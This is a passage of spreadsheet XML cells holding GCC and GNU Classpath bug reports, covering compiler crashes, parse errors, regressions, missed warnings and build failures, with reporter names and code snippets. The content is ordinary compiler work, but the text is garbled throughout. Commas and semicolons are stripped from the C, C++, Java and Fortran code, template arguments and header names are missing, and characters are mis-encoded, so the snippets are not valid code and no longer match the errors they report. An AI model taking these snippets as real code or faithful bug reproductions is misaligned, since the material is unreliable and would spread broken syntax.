/src/gcc/49905/gcc/testsuite/jit.dg/harness.h:27:14: error: static declaration of 'dejagnu_note' follows non-static declaration
/src/gcc/49905/gcc/testsuite/jit.dg/test-threads.c:25:6: note: previous declaration of 'dejagnu_note' was here
compiler exited with status 1
output is:
In file included from /src/gcc/49905/gcc/testsuite/jit.dg/test-accessing-struct.c:6:0
                 from /src/gcc/49905/gcc/testsuite/jit.dg/all-non-failing-tests.h:14
                 from /src/gcc/49905/gcc/testsuite/jit.dg/test-threads.c:82:
/src/gcc/49905/gcc/testsuite/jit.dg/harness.h:25:14: error: static declaration of 'dejagnu_pass' follows non-static declaration
/src/gcc/49905/gcc/testsuite/jit.dg/test-threads.c:23:6: note: previous declaration of 'dejagnu_pass' was here
In file included from /src/gcc/49905/gcc/testsuite/jit.dg/test-accessing-struct.c:6:0
                 from /src/gcc/49905/gcc/testsuite/jit.dg/all-non-failing-tests.h:14
                 from /src/gcc/49905/gcc/testsuite/jit.dg/test-threads.c:82:
/src/gcc/49905/gcc/testsuite/jit.dg/harness.h:26:14: error: static declaration of 'dejagnu_fail' follows non-static declaration
/src/gcc/49905/gcc/testsuite/jit.dg/test-threads.c:24:6: note: previous declaration of 'dejagnu_fail' was here
In file included from /src/gcc/49905/gcc/testsuite/jit.dg/test-accessing-struct.c:6:0
                 from /src/gcc/49905/gcc/testsuite/jit.dg/all-non-failing-tests.h:14
                 from /src/gcc/49905/gcc/testsuite/jit.dg/test-threads.c:82:
/src/gcc/49905/gcc/testsuite/jit.dg/harness.h:27:14: error: static declaration of 'dejagnu_note' follows non-static declaration
/src/gcc/49905/gcc/testsuite/jit.dg/test-threads.c:25:6: note: previous declaration of 'dejagnu_note' was here
FAIL: jit.dg/test-threads.c initial compilation</t>
  </si>
  <si>
    <t>GCC-61612</t>
  </si>
  <si>
    <t>trunk revision 211984 winnt.c â€˜hash_table_câ€™ does not name a type</t>
  </si>
  <si>
    <t>stage1 build fails (host==target==x86_64-pc-cygwin)
../../gcc/config/i386/winnt.c: In function â€˜const char* i386_find_on_wrapper_lis
t(const char*)â€™:
../../gcc/config/i386/winnt.c:787:22: error: â€˜hash_table_câ€™ does not name a type
       wrappers = new hash_table_c (8)
                      ^
../../gcc/config/i386/winnt.c:787:56: error: expected primary-expression before
â€˜&gt;â€™ token
       wrappers = new hash_table_c (8)
                                                        ^
../../gcc/config/i386/t-cygming:26: recipe for target 'winnt.o' failed</t>
  </si>
  <si>
    <t>GCC-43762</t>
  </si>
  <si>
    <t>VLA artificial length var loclist is missing DW_OP_stack_value</t>
  </si>
  <si>
    <t>gcc (GCC) 4.6.0 20100415 (experimental)
-O2 -g
-----------------------------------------------------------------------------
void __attribute__((noinline))
f (int l)
{
  char s[l]
}
int
main (void)
{
  f (5)
  return 0
}
-----------------------------------------------------------------------------
 : Abbrev Number: 5 (DW_TAG_variable)
       DW_AT_name        : s
       DW_AT_type        : 
 : Abbrev Number: 7 (DW_TAG_array_type)
 : Abbrev Number: 8 (DW_TAG_subrange_type)
       DW_AT_upper_bound : 
 : Abbrev Number: 4 (DW_TAG_variable)
       DW_AT_artificial  : 1
       DW_AT_type        : 
       DW_AT_location    : 0x83     (location list)
 : Abbrev Number: 10 (DW_TAG_const_type)
       DW_AT_type        : 
 : Abbrev Number: 9 (DW_TAG_base_type)
       DW_AT_byte_size   : 8
       DW_AT_encoding    : 7        (unsigned)
 : Abbrev Number: 3 (DW_TAG_formal_parameter)
       DW_AT_name        : l
       DW_AT_type        : 
       DW_AT_location    : 0x60     (location list)
 : Abbrev Number: 6 (DW_TAG_base_type)
       DW_AT_byte_size   : 4
       DW_AT_encoding    : 5        (signed)
       DW_AT_name        : int
Contents of the .debug_loc section:
    Offset   Begin    End      Expression
    00000060 0000000000400460 0000000000400468 (DW_OP_reg5)
    00000060 
    00000083 0000000000400460 0000000000400463 (DW_OP_breg5: 0 DW_OP_const1u: 32 DW_OP_shl DW_OP_const1u: 32 DW_OP_shra DW_OP_const1s: -1 DW_OP_plus)
    00000083 0000000000400463 0000000000400468 (DW_OP_breg5: -1)
    00000083 0000000000400468 000000000040046c (DW_OP_breg5: -31)
    00000083 
-----------------------------------------------------------------------------
I believe the loclist at 0x83 should have DW_OP_stack_value on each line.
Even according to recent (offlist) mail by Jakub these are location expressions.
I do not see in the DWARF spec. an explicit description what should mean a DIE reference for DW_AT_upper_bound currently generated by GCC as:
       DW_AT_upper_bound : 
I believe it was designed to supply there the real variable l holding the value such as if it would be:
       DW_AT_upper_bound : 
If an artificial variable calculating the same value is used the artificial variable should simulate it has such _value_ (and not such its _address_).
(This problem is also affecting Fortran dynamic arrays with -O2 -g.)</t>
  </si>
  <si>
    <t>GCC-9358</t>
  </si>
  <si>
    <t>ICE in simplify_gen_subreg</t>
  </si>
  <si>
    <t>=== Cut===
struct A { ~A() }
struct B {
  A a
  void x(B) {  }
}
void foo(const B&amp; b)
{
    B y
    y.x( b )
}
=== Cut ===
Gives an ICE with GCC 3.3 and 3.4 but not with 3.2:
gromit:~/tmp:[0]$ /opt/gcc/3.3-devel/bin/g++ -O1 -c test.cc
test.cc: In function `void foo(const B&amp;)':
test.cc:5: internal compiler error: in simplify_gen_subreg at simplify-rtx.c:
   2673
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gromit:~/tmp:[1]$ /opt/gcc/3.2-devel/bin/g++ -O1 -c test.cc
gromit:~/tmp:[0]$ /opt/gcc/3.4-devel/bin/g++ -O1 -c test.cc
test.cc: In function `void foo(const B&amp;)':
test.cc:5: internal compiler error: in simplify_gen_subreg at simplify-rtx.c:
   2629
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
GCC 3.3 since 2002-12-06
Environment:
i686-linux-gnu and x86_64-linux-gnu
How-To-Repeat:
Just compile the small test program.</t>
  </si>
  <si>
    <t>GCC-41038</t>
  </si>
  <si>
    <t>[4.4/4.5 regression] Parsing error related to qualified name id</t>
  </si>
  <si>
    <t>The following code compiles ok with -DOK1 or -DOK2. The default case generate the following error which seems wrong.
gmo2.cc: In member function 'int Packer::foo()':
gmo2.cc:17:29: error: request for member 'size' in 'Packer::var' which is of non-class type 'const std::string&amp;'
#include 
template 
struct base {
 const std::string
}
template
struct Packer 
 : public base 
 {
 int foo() {
#ifdef OK1
      return  Packer::size
#elif defined (OK2)
     return base::var.size()
#else
     return  Packer::var.size()
#endif
 }
 const std::string
 const int
}</t>
  </si>
  <si>
    <t>davidxl</t>
  </si>
  <si>
    <t>GCC-6131</t>
  </si>
  <si>
    <t>Working with Sun's 1.4 jre</t>
  </si>
  <si>
    <t>Really this is an am I doing it right question followed 
by does it work wiht a later version question.
[cat]$rpm -qa | grep java
gcc-java-2.96-0.48mdk
[cat]$ rpm -qa | grep gcj
libgcj-2.96-2mdk
libgcj-devel-2.96-2mdk
 cat cat.java
import java.io.*
import java.util.regex.*
class cat
{
  public static void main( String args[] )
  {
    BufferedReader in = new BufferedReader(
                          new InputStreamReader(
                            System.in))
    BufferedWriter out = new BufferedWriter(
                           new OutputStreamWriter(
                             System.out))
    Pattern fs = Pattern.compile(\t)
    String record
    String fields[]
    String field
    try {
      while( true ) {
        record = in.readLine()
        if( record == null )
          break
        field=
        for(i=0i&lt;record.length()i++) {
        }
        fields = fs.split(record0)
        out.write(record)
        out.newLine()
      }
      out.flush()
    }
    catch( IOException e ) {
    }
  }
}
export CLASSPATH=/opt/j2sdk1.4.0/jre/lib/rt.jar
[cat]$ gcj -o cat cat.java -lgcj
java/lang/String.java:0: bad value constant type 0 index 0
Release:
2.96
Environment:
Linux localhost.localdomain 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown</t>
  </si>
  <si>
    <t>plm</t>
  </si>
  <si>
    <t>GCC-10310</t>
  </si>
  <si>
    <t>[3.4 regression] [New parser] ICE on illegal use of template keyword</t>
  </si>
  <si>
    <t>Compiling the following line of code with mainline g++ I get an ICE
---------------------snip here-----------------
template void operator)
---------------------snip here-----------------
bug.cpp:1: error: declaration of `operator&lt;&lt;' as non-function
bug.cpp:1: internal compiler error: tree check: expected class 'd' have 't' (
   void_type) in do_decl_instantiation at cp/pt.c:10324
Please submit a full bug report [etc.]
So it's actually an error recovery problem but nevertheless
a regression since I don't get the ICE with the 3.2 or 3.3 branch.
(BTW all compilers were configured with --enable-checking)
Release:
gcc 3.4 20030402
Environment:
i686-pc-linux-gnu</t>
  </si>
  <si>
    <t>GCC-78519</t>
  </si>
  <si>
    <t>missing warning for sprintf %s with null pointer</t>
  </si>
  <si>
    <t>In the following program GCC diagnoses with -Wformat the invalid call to sprintf in f but misses the same problem in g because the checker runs too early to see the null.  The problem could trivially be detected by the gimple-ssa-sprintf pass.
$ cat a.c &amp;&amp; /build/gcc-svn/gcc/xgcc -B /build/gcc-svn/gcc -O2 -S -Wall -Wextra -Wpedantic a.c
char d[2]
void f (void)
{
  __builtin_sprintf (d %s (char*)0)
}
void g (void)
{
  char *s = 0
  __builtin_sprintf (d %s s)
}
a.c: In function â€˜fâ€™:
a.c:5:3: warning: reading through null pointer (argument 3) [-Wformat=]
   __builtin_sprintf (d %s (char*)0)
   ^~~~~~~~~~~~~~~~~</t>
  </si>
  <si>
    <t>GCC-50757</t>
  </si>
  <si>
    <t>Cannot turn off -Wnonnull when using C++</t>
  </si>
  <si>
    <t>When using gcc e.g. in embedded systems it can happen that valid memory regions start at address 0x0. E.g. in our System a huge DDR2 starts at 0x0 and we cannot move it easily or even reserve page 0.
Although it is almost impossible that the start address of a format string will be at address 0 there's still the possibility that this is normal memory that has to be used by the application e.g as a buffer.
Therefore it might happen that one wants to write something like
  memset(myptr 0 mysize)
or
  memcpy(myptr mydata datasize)
with myptr beeing 0 or even worse constant 0 (char * const myptr = 0x0)
Trying to turn -Wnonnull off (which is being turned on automatically using -Wall/-Wformat) using e.g. this command line
  g++-4.6  -Wall [-Werror] -Wno-nonnull ...
causes an error
  cc1plus: warning: command line option â€˜-Wno-nonnullâ€™ is valid for C/ObjC but not for C++ ...
If it is allowed to implicitly turn on -Wnonnull it must also be allowed to turn it off again. Even in C++.</t>
  </si>
  <si>
    <t>roman.fietze</t>
  </si>
  <si>
    <t>GCC-8545</t>
  </si>
  <si>
    <t>[parser] failure to parse object declaration</t>
  </si>
  <si>
    <t>The following code fails to compile:
class test{}
int main() {
    test t((test()))
}
The error is:
main.cpp: In function `int main()':
main.cpp:3: parse error before `)' token
I disagree with this error and so does Comeau C++ 4.3. The declaration can be parsed as an object declaration (but not a function one) so why isn't it?
Release:
3.2
Environment:
Reading specs from c:/Dev-C++/bin/../lib/gcc-lib/mingw32/3.2/specs
Configured with: ../gcc/configure --with-gcc --with-gnu-ld --with-gnu-as --host=
mingw32 --target=mingw32 --prefix=/mingw --enable-threads --disable-nls --enable
-languages=f77c++objcada --disable-win32-registry --disable-shared
Thread model: win32
gcc version 3.2 (mingw special 20020817-1)
How-To-Repeat:
$ echo class test{}int main(){test t((test()))} &gt; main.cpp
$ g++ main.cpp</t>
  </si>
  <si>
    <t>tom.widmer</t>
  </si>
  <si>
    <t>GCC-30416</t>
  </si>
  <si>
    <t>SIGSEGV in valarray::cshift(n) on empty array</t>
  </si>
  <si>
    <t>AFAIK the program below should have well-defined behavior but it abends with
gcc 4.1.0 on Solaris 9.
$ cat t.cpp &amp;&amp; g++ -g t.cpp -static &amp;&amp; gdb ./a.out
#include 
int main ()
{
    const std::valarray a
    a.cshift (1)
} 
GNU gdb 6.5
Copyright (C) 2006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sparc-sun-solaris2.9...
(gdb) run
Starting program: a.out 
Program received signal SIGSEGV Segmentation fault.
0x00024db8 in memcpy ()
(gdb) where
#0  0x00024db8 in memcpy ()
#1  0x00010368 in std::_Array_copy_ctor::_S_do_it (__b=0x0 
    __e=0x4 __o=0xffbffb94)
    at /usr/local/gcc-4.1.0/lib/gcc/sparc-sun-solaris2.9/4.1.0/../../../../include/c++/4.1.0/bits/valarray_array.h:165
#2  0x00010398 in std::__valarray_copy_construct (__b=0x0 __e=0x4 
    __o=0xffbffb94)
    at /usr/local/gcc-4.1.0/lib/gcc/sparc-sun-solaris2.9/4.1.0/../../../../include/c++/4.1.0/bits/valarray_array.h:174
#3  0x0001057c in std::valarray::cshift (this=0xffbffc20 __n=1)
    at /usr/local/gcc-4.1.0/lib/gcc/sparc-sun-solaris2.9/4.1.0/../../../../include/c++/4.1.0/valarray:821
#4  0x00010288 in main () at /nfs/b20/sebor/tmp/t.cpp:8</t>
  </si>
  <si>
    <t>GCC-4682</t>
  </si>
  <si>
    <t>undefined reference to `target_flags'</t>
  </si>
  <si>
    <t>make bootstrap fails with undefined reference to `target_flags' in module gcc-20011023/sparc-sun-solaris2.8/gcc/../../gcc/rtl.c
Release:
gcc version 3.0.2 20011007 (prerelease)
Environment:
solaris 2.8 GNU ld version 2.11.2 (with BFD 2.11.2)
How-To-Repeat:
make bootstrap</t>
  </si>
  <si>
    <t>GCC-73</t>
  </si>
  <si>
    <t>g++ template bug</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Sat 19 Feb 2000 03:21:14 -0500
 Original-Message-ID: 
 I've encountered this error a few times in g++2.95.2 and finally
 pinned it down to a small case (~60 lines after preprocessing).  The
 code is below followed by the output of g++ with -v --save-temps as
 suggested in the bug reporting info.  A comment in the code below
 points to the crux of the matter.
 ----------------------------------------------------------------------
 // This demonstrates my compiler bug
 template 
 struct Help {
    typedef A First
    typedef B Second
    typedef D Third
 }
 template 
 struct HelpSig {
    typedef A First
    typedef B Second
    typedef C Third
 }
 struct Plus {
    template 
    struct Sig : public HelpSig {}
    template 
    T operator()( const T&amp; x const T&amp; y ) const {
       return x+y
    }
 }
 template 
 struct Ethel {
    typedef T WrappedType
 }
 struct Fred {
 //////////////////////////////////////////////////////////////////////
 // If you comment out this thing below the compiler quits
 // (mis)reporting errors   (this this isn't even used!!!)
 //////////////////////////////////////////////////////////////////////
    template 
    struct Fig : public Help&lt;ZLALB
    Ethel&lt;typename Z::Sig&lt;typename LA::WrappedType
			 typename LB::WrappedType&gt;::Third&gt; &gt; {}
 //////////////////////////////////////////////////////////////////////
    template 
    Ethel::Third&gt;
    operator()( const Z&amp; const Ethel&amp; const Ethel&amp;) const {
       return Ethel::Third&gt;()
    }
 }
 int main() {
    Fred()( Plus() Ethel() Ethel() )
    return 0
 }
 ----------------------------------------------------------------------
 Reading specs from /net/hp45/yannis/gcc.2.95.2-install/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/specs
 gcc version 2.95.2 19991024 (release)
  /net/hp45/yannis/gcc.2.95.2-install/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/cpp -lang-c++ -v -I/net/hp45/yannis/gcc.2.95.2-install//include/g++ -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D__sparc__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__sparc -D__sun -D__unix -Asystem(unix) -Asystem(svr4) -D__EXCEPTIONS -D__OPTIMIZE__ -W -Wall -Woverloaded-virtual -D__GCC_NEW_VARARGS__ -Acpu(sparc) -Amachine(sparc) foo.cc foo.ii
 GNU CPP version 2.95.2 19991024 (release) (sparc)
 #include ... search starts here:
 #include  search starts here:
  /net/hp45/yannis/gcc.2.95.2-install/include/g++
  /net/hp45/yannis/gcc.2.95.2-install/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/../../../../sparc-sun-solaris2.7/include
  /net/hp45/yannis/gcc.2.95.2-install/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/include
  /usr/include
 End of search list.
 The following default directories have been omitted from the search path:
  /net/hp45/yannis/gcc.2.95.2-install/include/g++
  /net/hp45/yannis/gcc.2.95.2-install/include/include
 End of omitted list.
  /net/hp45/yannis/gcc.2.95.2-install/lib/gcc-lib/sparc-sun-solaris2.7/2.95.2/cc1plus foo.ii -quiet -dumpbase foo.cc -O -W -Wall -Woverloaded-virtual -version -o foo.s
 GNU C++ version 2.95.2 19991024 (release) (sparc-sun-solaris2.7) compiled by GNU C version 2.95.2 19991024 (release).
 foo.cc: In function `int main()':
 foo.cc:45: `int' is not a class struct or union type
 foo.cc:45: `int' is not a class struct or union type
 foo.cc:45: template argument 1 is invalid
 foo.cc:45: template argument 2 is invalid
 foo.cc:45: template argument 1 is invalid
 foo.cc:45: `Fred::operator ()(...)' must be a nonstatic member function
 foo.cc: At top level:
 foo.cc: In instantiation of `Fred::operator ()(...)':
 foo.cc:51:   instantiated from here
 foo.cc:45: `int' is not a class struct or union type
 foo.cc:45: `int' is not a class struct or union type
 foo.cc:45: template argument 1 is invalid
 foo.cc:45: template argument 2 is invalid
 foo.cc:45: template argument 1 is invalid
 foo.cc:45: `Fred::operator ()(...)' must be a nonstatic member function
 foo.cc: In function `{error} Fred::operator ()(...)':
 foo.cc:45: return-type `{error}' is an incomplete type
 foo.cc:45: confused by earlier errors bailing out
 ----------------------------------------------------------------------
 -- 
 -Brian McNamara (lorgon@cc.gatech.edu) your friendly CS 2340 TA
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-21623</t>
  </si>
  <si>
    <t>[4.1 regression] ICE in reload_cse_simplify_operands at postreload.c:391</t>
  </si>
  <si>
    <t>Using crosstool-0.34 building glibc-2.3.5 on sh4 is ok with gcc-3.4.3 
fails with gcc-4.0.0.  The attached reduced testcase shows the error:
foo2.i: In function 'plural_eval':
foo2.i:78: error: insn does not satisfy its constraints:
(insn 190 188 275 24 (set (reg/v:SI 76 fr12 [orig:169 n ] [169])
        (reg:SI 147 t)) 129 {movsi_ie} (insn_list:REG_DEP_TRUE 188 (nil))
    (nil))
foo2.i:78: internal compiler error: in reload_cse_simplify_operands at
postreload.c:391</t>
  </si>
  <si>
    <t>dank</t>
  </si>
  <si>
    <t>GCC-54194</t>
  </si>
  <si>
    <t>misleading suggestion about arithmetic in operand of '|'</t>
  </si>
  <si>
    <t>Using gcc version 4.8.0 20120806 (experimental) (GCC)
Target: x86_64-unknown-linux-gnu
to compile the following code:
int main()
{
char in[4]={0} out[6]
out[1] = in[1] 
}
results in a misleading warning (misplaced caret):
$ g++-48 -c -Wall -Werror w.cc
w.cc: In function 'int main()':
w.cc:4:45: error: suggest parentheses around arithmetic in operand of '|' [-Werror=parentheses]
 out[1] = in[1] 
                                             ^
The problematic operand is the left operand of '|' but the caret appears to be pointing at the right operand.
For example clang version 3.2 (trunk 161319) gives
$ clang++ -c -Wall -Werror w.cc
w.cc:4:16: error: '&amp;' within '|' [-Werror-Wbitwise-op-parentheses]
out[1] = in[1] 
         ~~~~~~^~~~~~ ~
w.cc:4:16: note: place parentheses around the '&amp;' expression to silence this warning
out[1] = in[1] 
               ^
         (           )</t>
  </si>
  <si>
    <t>csaba_22</t>
  </si>
  <si>
    <t>GCC-14771</t>
  </si>
  <si>
    <t>frontend doesn't record parentheses</t>
  </si>
  <si>
    <t>gfortran parses
 c = a + b + c
as 
 (assign c (+ (+ a b) c))
which is the same parse tree as for
 c = (a + b) + c
Fortran allows a greater range of optimizations in the former case but since it
is unable to distinguish between those two cases the former case may be
unnecessarily pessimized by optimizers.
I have a patch to the parser and parse-tree dumper which makes gfortran record
the parentheses. It is covered by my copyright assignment to g95 as I prepared
the patch in Oct 2002. Since I have no copyright assignment for gcc I'm not sure
if I can update it for the current sources (mostly formatting and function name
changes) without running into copyright trouble. Therefore I point you to my old
patch which I reposted to the gfortran list:
http://gcc.gnu.org/ml/fortran/2004-03/msg00048.html with the matchexp.c part
replaced by the patch from http://gcc.gnu.org/ml/fortran/2004-03/msg00046.html
The original postings on g95-develop@lists.sourceforge.net can be found in the
thread following this posting:
http://www.geocrawler.com/archives/3/3588/2002/10/50/9910846/</t>
  </si>
  <si>
    <t>CLASSPATH-24876</t>
  </si>
  <si>
    <t>Regex failure</t>
  </si>
  <si>
    <t>The attached testprogram fails to correctly match the pattern on the string. I found this bug while testing out jIRCii which otherwise works to a certain degree but fails to parse the IRC JOIN response and is therefore unable to use for IRCing.</t>
  </si>
  <si>
    <t>GCC-15018</t>
  </si>
  <si>
    <t>[3.3 Regression] G++ ICE on struct array element with missing opening curly brace</t>
  </si>
  <si>
    <t>This bug has been tested to kill the following GCC versions:
GCC 3.3.2 for x86 Linux:
 gcc (GCC) 3.3.2 20031218 (Gentoo Linux 3.3.2-r5 propolice-3.3-7)
GCC 3.3.3 for amd64 Linux:
gcc (GCC) 3.3.3 20040217 (Gentoo Linux 3.3.3 propolice-3.3-7)
uname -a: Linux sivar-laptop 2.6.3-gentoo-r2 #7 Thu Mar 11 23:09:40 MST 2004
x86_64 4  GNU/Linux
Basically the same error for both Gentoo Linux systems:
crash.c:20: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccy0IsmV.out file please attach this to
your bugreport
----------------------------------------------------------------
GCC 3.0 for HP-UX:
 Configured with: ../gcc/configure --enable-languages=cc++
--host=hppa1.1-hp-hpux11.00 --target=hppa1.1-hp-hpux11.00
--with-ld=/usr/ccs/bin/ld --with-gnu-as --enable-libstdcxx-v3
Thread model: single
gcc version 3.0
uname -a: HP-UX ux5 B.11.00 U 9000/800 618339393 unlimited-user license
Error for HP-UX:
crash.cpp:20: Internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
----------------------------------------------------------------
The bug does not kill GCC for Redhat x86:
gcc version 2.96 20000731 (Red Hat Linux 7.3 2.96-113)
 On it I get the following compiler error:
crash.cpp:20: sorry not implemented: non-trivial labeled initializers
crash.cpp:21: parse error before `{'
uname -a:Linux progeny.isu.edu 2.4.25 #2 Fri Apr 9 23:55:35 MDT 2004 i686 unknown
GCC for redhat was the default binary package so no special compiler flags were
used which cause the problem (unless used by Redhat obviously)
Gentoo GCC's were compiled with -march=athlon -O2 -pipe -fomit-frame-pointer
and -O2 -pipe -fomit-frame-pointer respectively.
----------------------------------------------------------------
Every G++ build command I tried will crash including simply: 
 g++ crash.cpp
The extended (with -v) compiler output on the x86-Linux-Gentoo system is as follows:
Reading specs from /usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/specs
Configured with: /var/tmp/portage/gcc-3.3.2-r5/work/gcc-3.3.2/configure
--prefix=/usr --bindir=/usr/i686-pc-linux-gnu/gcc-bin/3.3
--includedir=/usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/include
--datadir=/usr/share/gcc-data/i686-pc-linux-gnu/3.3
--mandir=/usr/share/gcc-data/i686-pc-linux-gnu/3.3/man
--infodir=/usr/share/gcc-data/i686-pc-linux-gnu/3.3/info --enable-shared
--host=i686-pc-linux-gnu --target=i686-pc-linux-gnu --with-system-zlib
--enable-languages=cc++f77objcjava --enable-threads=posix --enable-long-long
--disable-checking --enable-cstdio=stdio --enable-clocale=generic
--enable-__cxa_atexit --enable-version-specific-runtime-libs
--with-gxx-include-dir=/usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/include/g++-v3
--with-local-prefix=/usr/local --enable-shared --enable-nls
--without-included-gettext --disable-multilib
Thread model: posix
gcc version 3.3.2 20031218 (Gentoo Linux 3.3.2-r5 propolice-3.3-7)
 /usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/cc1plus -E -D__GNUG__=3 -quiet -v
-D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=2 -D_GNU_SOURCE crash.cpp
crash.ii
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /usr/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/include/g++-v3
 /usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/include/g++-v3/i686-pc-linux-gnu
 /usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/include/g++-v3/backward
 /usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/cc1plus -fpreprocessed crash.ii -quiet
-dumpbase crash.cpp -auxbase crash -version -o crash.s
GNU C++ version 3.3.2 20031218 (Gentoo Linux 3.3.2-r5 propolice-3.3-7)
(i686-pc-linux-gnu)
        compiled by GNU C version 3.3.2 20031218 (Gentoo Linux 3.3.2-r5
propolice-3.3-7).
GGC heuristics: --param ggc-min-expand=99 --param ggc-min-heapsize=129278
crash.cpp:20: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccAd8gxF.out file please attach this to
your bugreport
I am sure it is similar on all the other architectures so I'm sure you'll
appreciate that I won't post them here unless someone really needs the info.</t>
  </si>
  <si>
    <t>GCC-61640</t>
  </si>
  <si>
    <t>KIND=4 Character Array Internal Unit Read Fail</t>
  </si>
  <si>
    <t>The following fails on the read. Found while working on another bug.
program read_internal
  integer :: x(9)iiostat
  character(len=512) :: iomsg
  character(kind=4len=30) dimension(3) :: source
  source=[4_  1   1  -14_  1  -1   14_ -1   1   1]
  print * (trim(source(i)) i=13)
  read(source*) (x(i) i=16) ! This read fails for KIND=4 character
end program read_internal
The fix is:
Index: list_read.c
===================================================================
--- list_read.c	(revision 212104)
+++ list_read.c	(working copy)
@@ -2737 +2737 @@ next_char_internal (st_parameter_dt *dtp)
   /* Get the next character and handle end-of-record conditions.  */
   if (dtp-&gt;common.unit) /* Check for kind=4 internal unit.  */
-   length = sread (dtp-&gt;u.p.current_unit-&gt;s 
+   length = sread (dtp-&gt;u.p.current_unit-&gt;s 
   else
    {
      char cc
Index: unix.c
===================================================================
--- unix.c	(revision 212104)
+++ unix.c	(working copy)
@@ -80810 +80810 @@ mem_read4 (stream * s void * buf ssize_t nbytes)
   void *p
   int nb = nbytes
-  p = mem_alloc_r (s 
+  p = mem_alloc_r4 (s 
   if (p)
     {
-      memcpy (buf p nb)
+      memcpy (buf p nb * 4)
       return (ssize_t) nb
     }
   else</t>
  </si>
  <si>
    <t>GCC-50022</t>
  </si>
  <si>
    <t>[4.7 regression] incorrect condition in IT block when building mozilla code base for ARM</t>
  </si>
  <si>
    <t>Taking the attached preprocessed file the following fails with latest gcc snapshot (4.7-20110806):
$ g++ -std=gnu++0x -o test.o -c nsCookieService.i -mthumb -O3 -march=armv7-a -mfloat-abi=softfp
/tmp/ccxA5O8X.s: Assembler messages:
/tmp/ccxA5O8X.s:2694: Error: incorrect condition in IT block -- `ldrdlt r2[r3]'
/tmp/ccxA5O8X.s:2695: Error: thumb conditional instruction should be in IT block -- `smullge r2r3r3r2'
The error is slightly different when adding -fomit-frame-pointer:
/tmp/ccSzGgKB.s: Assembler messages:
/tmp/ccSzGgKB.s:2702: Error: thumb conditional instruction should be in IT block -- `ldrdlt r2[r3]'</t>
  </si>
  <si>
    <t>mh+gcc</t>
  </si>
  <si>
    <t>GCC-691</t>
  </si>
  <si>
    <t>i'm new so this may not be a bug</t>
  </si>
  <si>
    <t>could be an ice-on-illegal-code
compiling a generic function in which i pass a
function to mytransform algorithm which in turn uses 
another template called square_it.
g++ -O -c ch8.cpp
ch8.cpp: In function `int main()':
ch8.cpp:19: Internal compiler error.
ch8.cpp:19: Please submit a full bug report to `egcs-bugs@egcs.cygnus.com'.
ch8.cpp:19: See  for details.
make: *** [ch8.o] Error 1
Release:
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
Environment:
redhat linux 6.2 with some stuff added running on
a dell precision 420
How-To-Repeat:
basically ch8.cpp looks like this:
#include 
#include 
#include myalgos.cpp
using std::cout
using std::endl
using std::vector
int main()
{
  vector vi v2
  for (float i = 0 i &lt; 10 i++)
    vi.push_back(i)
  mytransform(vi.begin() vi.end() back_inserter(v2) square_it)
  for (vector::iterator i = v2.begin() i != v2.end() i++)
    cout &lt;&lt; *i &lt;&lt; endl
}</t>
  </si>
  <si>
    <t>mecase</t>
  </si>
  <si>
    <t>GCC-3963</t>
  </si>
  <si>
    <t>Bootstrap failure with colons in objdir</t>
  </si>
  <si>
    <t xml:space="preserve">	libstdc++ causes a bootstrap failure if the name of objdir
	contains a colon.
	Here's the build log:
	gmake[3]: Entering directory `/files/pfeifer/OBJ-0808-07:45/i386-unknown-freebsd 4.3/libstdc++-v3'
	Making all in include
	gmake[4]: Entering directory `/files/pfeifer/OBJ-0808-07:45/i386-unknown-freebsd 4.3/libstdc++-v3/include'
	Makefile:577: *** target pattern contains no `%'.  Stop.
	gmake[4]: Leaving directory `/files/pfeifer/OBJ-0808-07:45/i386-unknown-freebsd4.3/libstdc++-v3/include'  
	gmake[3]: *** [all-recursive] Error 1
	gmake[3]: Leaving directory `/files/pfeifer/OBJ-0808-07:45/i386-unknown-freebsd4.3/libstdc++-v3'
	gmake[2]: *** [all-recursive-am] Error 2
	gmake[2]: Leaving directory `/files/pfeifer/OBJ-0808-07:45/i386-unknown-freebsd4.3/libstdc++-v3'
	gmake[1]: *** [all-target-libstdc++-v3] Error 2
	gmake[1]: Leaving directory `/files/pfeifer/OBJ-0808-07:45'
	gmake: *** [bootstrap-lean] Error 2
Release:
3.0.1 20010807 (prerelease)
Environment:
System: FreeBSD taygeta.dbai.tuwien.ac.at 4.3-RELEASE FreeBSD 4.3-RELEASE #0: Wed May 9 12:46:22 CEST 2001 root@agena.dbai.tuwien.ac.at:/usr/src/sys/compile/KERNEL_4.3 i386
	This report is for i386-unknown-freebsd4.3 but the problem is
	portable I experienced it on sparc-sun-solaris2.8 and other
	platforms as well.</t>
  </si>
  <si>
    <t>GCC-51150</t>
  </si>
  <si>
    <t>[C++11][4.6/4.7 Regression] ICE when result of -&gt; initializes const variable of different type</t>
  </si>
  <si>
